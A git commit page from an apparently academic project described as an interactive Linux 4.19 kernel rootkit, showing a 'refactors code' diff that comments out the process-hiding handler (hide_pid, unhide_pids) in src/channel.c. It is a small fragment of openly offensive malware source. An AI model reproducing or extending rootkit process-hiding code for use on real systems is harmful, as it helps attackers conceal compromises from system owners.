linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit
Log | Files | Refs
commit 293cc71d5d8c787dbda80be2bc2ca909e9120f01
parent eee5cda4796ca7691d2142db4a41bfb47d5cb4dd
Author: deurzen <m.deurzen@tum.de>
Date:   Sun, 29 Nov 2020 11:42:54 +0100

refactors code

Diffstat:

Msrc/channel.c | 34+++++++++++++++++-----------------


1 file changed, 17 insertions(+), 17 deletions(-)

diff --git a/src/channel.c b/src/channel.c
@@ -134,25 +134,25 @@ handle_togglebd(unsigned long arg)
 int
 handle_hidepid(unsigned long arg)
 {
-    char *msg;
+    char *msg = "ok??";
     long sarg = (long)arg;
 
-    if (!sarg) {
-        unhide_pids();
-        rootkit.hiding_pids = false;
-        msg = "hidepid off";
-    } else if (sarg < 0) {
-        unhide_pid((pid_t)((-1) * sarg));
-        sprintf(msg, "unhiding pid %d", (pid_t)((-1) * sarg));
-    } else if (sarg > 0) {
-        if (!rootkit.hiding_files) {
-            DEBUG_NOTICE("hidepid on\n");
-            rootkit.hiding_pids = true;
-        }
-
-        hide_pid((pid_t)sarg);
-        sprintf(msg, "hiding pid %d", (pid_t)sarg);
-    }
+    /* if (!sarg) { */
+    /*     /1* unhide_pids(); *1/ */
+    /*     /1* rootkit.hiding_pids = false; *1/ */
+    /*     msg = "hidepid off"; */
+    /* } else if (sarg < 0) { */
+    /*     /1* unhide_pid((pid_t)((-1) * sarg)); *1/ */
+    /*     sprintf(msg, "unhiding pid %d", (pid_t)((-1) * sarg)); */
+    /* } else if (sarg > 0) { */
+    /*     if (!rootkit.hiding_pids) { */
+    /*         DEBUG_NOTICE("hidepid on\n"); */
+    /*         rootkit.hiding_pids = true; */
+    /*     } */
+
+    /*     /1* hide_pid((pid_t)sarg); *1/ */
+    /*     sprintf(msg, "hiding pid %d", (pid_t)sarg); */
+    /* } */
 
     DEBUG_NOTICE("%s\n", msg);